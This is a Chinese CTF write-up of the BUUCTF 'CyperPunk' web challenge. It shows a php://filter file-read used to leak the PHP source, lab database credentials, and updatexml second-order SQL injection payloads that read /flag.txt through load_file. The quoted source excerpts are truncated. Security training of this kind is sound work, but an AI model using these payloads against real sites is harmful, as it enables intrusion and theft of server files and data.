BUUCTF WEB CyperPunk
时间:2023-09-18 06:37:01
打开场景,查看源码,找到hint
所以考虑文件读漏洞
尝试?file=php://filter/convert.base64-encode/reosurce=index.php
成功回显
PD9waHAKCmluaV9zZXQoJ29wZW5fYmFzZWRpcicsICcvdmFyL3d3dy9odG1sLycpOwoKLy8gJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwokZmlsZSA9IChpc3NldCgkX0dFVFsnZmlsZSddKSA/ICRfR0VUWydmaWxlJ10gOiBudWxsKTsKaWYgKGlzc2V0KCRmaWxlKSl7CiAgICBpZiAocHJlZ19tYXRjaCgiL3BoYXJ8emlwfGJ6aXAyfHpsaWJ8ZGF0YXxpbnB1dHwlMDAvaSIsJGZpbGUpKSB7CiAgICAgICAgZWNobygnbm8gd2F5IScpOwogICAgICAgIGV4aXQ7CiAgICB9CiAgICBAaW5jbHVkZSgkZmlsZSk7Cn0KPz4KCjwhRE9DVFlQRSBodG1sPgo8aHRtbCBsYW5nPSJlbiI CjxoZWFkPgo8bWV0YSBjaGFyc2V0PSJ1dGYtOCI Cjx0aXRsZT5pbmRleDwvdGl0bGU CjxiYXNlIGhyZWY9Ii4vIj4KPG1ldGEgY2hhcnNldD0idXRmLTgiIC8 Cgo8bGluayBocmVmPSJhc3NldHMvY3NzL2Jvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI CjxsaW5rIGhyZWY9ImFzc2V0cy9jc3MvY3VzdG9tLWFuaW1hdGlvbnMuY3NzIiByZWw9InN0eWxlc2hlZXQiPgo8bGluayBocmVmPSJhc3NldHMvY3NzL3N0eWxlLmNzcyIgcmVsPSJzdHlsZXNoZWV0Ij4KCjwvaGVhZD4KPGJvZHk CjxkaXYgaWQ9ImgiPgoJPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KICAgICAgICA8aDI MjA3N WPkeWUruS6hizkuI3mnaXku73lrp7kvZPlhbjol4/niYjlkJc/PC9oMj4KICAgICAgICA8aW1nIGNsYXNzPSJsb2dvIiBzcmM9Ii4vYXNzZXRzL2ltZy9sb2dvLWVuLnBuZyI PCEtLUxPR09MT0dPTE9HT0xPR08tLT4KICAgICAgICA8ZGl2IGNsYXNzPSJyb3ciPgoJCQk8ZGl2IGNsYXNzPSJjb2wtbWQtOCBjb2wtbWQtb2Zmc2V0LTIgY2VudGVyZWQiPgogICAgICAgICAgICAgICAgPGgzPuaPkOS6pOiuouWNlTwvaDM CiAgICAgICAgICAgICAgICA8Zm9ybSByb2xlPSJmb3JtIiBhY3Rpb249Ii4vY29uZmlybS5waHAiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0iYXBwbGljYXRpb24veC13d3ctdXJsZW5jb2RlZCI CiAgICAgICAgICAgICAgICAgICAgPHA CiAgICAgICAgICAgICAgICAgICAgPGgzPuWnk WQjTo8L2gzPgogICAgICAgICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBjbGFzcz0ic3Vic2NyaWJlLWlucHV0IiBuYW1lPSJ1c2VyX25hbWUiPgogICAgICAgICAgICAgICAgICAgIDxoMz7nlLXor506PC9oMz4KICAgICAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgY2xhc3M9InN1YnNjcmliZS1pbnB1dCIgbmFtZT0icGhvbmUiPgogICAgICAgICAgICAgICAgICAgIDxoMz7lnLDlnYA6PC9oMz4KICAgICAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgY2xhc3M9InN1YnNjcmliZS1pbnB1dCIgbmFtZT0iYWRkcmVzcyI CiAgICAgICAgICAgICAgICAgICAgPC9wPgogICAgICAgICAgICAgICAgICAgIDxidXR0b24gY2xhc3M9J2J0biBidG4tbGcgIGJ0bi1zdWIgYnRuLXdoaXRlJyB0eXBlPSJzdWJtaXQiPuaIkeato aYr mAgemSseS5i S6ujwvYnV0dG9uPgogICAgICAgICAgICAgICAgPC9mb3JtPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgIDwvZGl2Pgo8L2Rpdj4KCjxkaXYgaWQ9ImYiPgogICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KCQk8ZGl2IGNsYXNzPSJyb3ciPgogICAgICAgICAgICA8aDIgY2xhc3M9Im1iIj7orqLljZXnrqHnkIY8L2gyPgogICAgICAgICAgICA8YSBocmVmPSIuL3NlYXJjaC5waHAiPgogICAgICAgICAgICAgICAgPGJ1dHRvbiBjbGFzcz0iYnRuIGJ0bi1sZyBidG4tcmVnaXN0ZXIgYnRuLXdoaXRlIiA 5oiR6KaB5p l6K6i5Y2VPC9idXR0b24 CiAgICAgICAgICAgIDwvYT4KICAgICAgICAgICAgPGEgaHJlZj0iLi9jaGFuZ2UucGhwIj4KICAgICAgICAgICAgICAgIDxidXR0b24gY2xhc3M9ImJ0biBidG4tbGcgYnRuLXJlZ2lzdGVyIGJ0bi13aGl0ZSIgPuaIkeimgeS/ruaUueaUtui0p WcsOWdgDwvYnV0dG9uPgogICAgICAgICAgICA8L2E CiAgICAgICAgICAgIDxhIGhyZWY9Ii4vZGVsZXRlLnBocCI CiAgICAgICAgICAgICAgICA8YnV0dG9uIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1yZWdpc3RlciBidG4td2hpdGUiID7miJHkuI3mg7PopoHkuoY8L2J1dHRvbj4KICAgICAgICAgICAgPC9hPgoJCTwvZGl2PgoJPC9kaXY CjwvZGl2PgoKPHNjcmlwdCBzcmM9ImFzc2V0cy9qcy9qcXVlcnkubWluLmpzIj48L3NjcmlwdD4KPHNjcmlwdCBzcmM9ImFzc2V0cy9qcy9ib290c3RyYXAubWluLmpzIj48L3NjcmlwdD4KPHNjcmlwdCBzcmM9ImFzc2V0cy9qcy9yZXRpbmEtMS4xLjAuanMiPjwvc2NyaXB0Pgo8c2NyaXB0IHNyYz0iYXNzZXRzL2pzL2pxdWVyeS51bnZlaWxFZmZlY3RzLmpzIj48L3NjcmlwdD4KPC9ib2R5Pgo8L2h0bWw CjwhLS0/ZmlsZT0/LS0 Cg==
base64解码
index 2077发售了,不来实体收藏版吗?
提交订单
注意到了ini_set(‘open_basedir’, ‘/var/www/html/’);也就是说这个页面不存在目录穿越,页面里在form表单里给了confirm.php,下载解码
query($sql);
}
if($fetch->num_rows>0) {
$msg = $user_name."已提交订单";
}else{
$sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)";
$re = $db->prepare($sql);
$re->bind_param("sss", $user_name, $address, $phone);
$re = $re->execute();
if(!$re) {
echo 'error';
print_r($db->error);
exit;
}
$msg = "订单提交成功";
}
} else {
$msg = "信息不全";
}
?>
确认订单
可以看到这个页面过滤的关键字包括select,update啥的,就知道往sql注入里想了,先简单看一下。给了config.php。继续下载解码
"127.0.0.1",
"username" => "root",
"password" => "root",
"dbname" =>"ctfusers"
);
$db = new mysqli($DATABASE['host'],$DATABASE['username'],$DATABASE['password'],$DATABASE['dbname']);
后面分析了confirm.php里面的insert发现用了预定义,并没有找到利用点,但是index.php里面还有其他页面,继续
change.php
query($sql);
}
if (isset($fetch) && $fetch->num_rows>0){
$row = $fetch->fetch_assoc();
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
$result = $db->query($sql);
if(!$result) {
echo 'error';
print_r($db->error);
exit;
}
$msg = "订单修改成功";
} else {
$msg = "未找到订单!";
}
}else {
$msg = "信息不全";
}
?>
修改收货地址
修改收货地址
'.$msg.'';?>
在这里发现了问题
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
新地址进行了单引号转义,但是old_address和user_id都是我们之前在insert阶段数据库存的,在insert阶段由于预定义的关系单引号之类的特殊字符会被转义
但是在存到数据库中时又会恢复到单引号的状态,而且address在confirm.php页面都没有进行关键词过滤
这样的话,就构成了二次注入
在原始页面地址页面注入payload:
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,30)),0x7e),1)#
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),30,50)),0x7e),1)#
修改页面随便输,成功报错注入
读两次flag就好了
第一次读出来的:flag{3b97108b-7cd8-4ef6-aa38-b
第二次读出来的:b0c9fddd7376}
拼接:flag{3b97108b-7cd8-4ef6-aa38-b0c9fddd7376}
参考视频链接:https://www.bilibili.com/video/bv1o34y1b7SH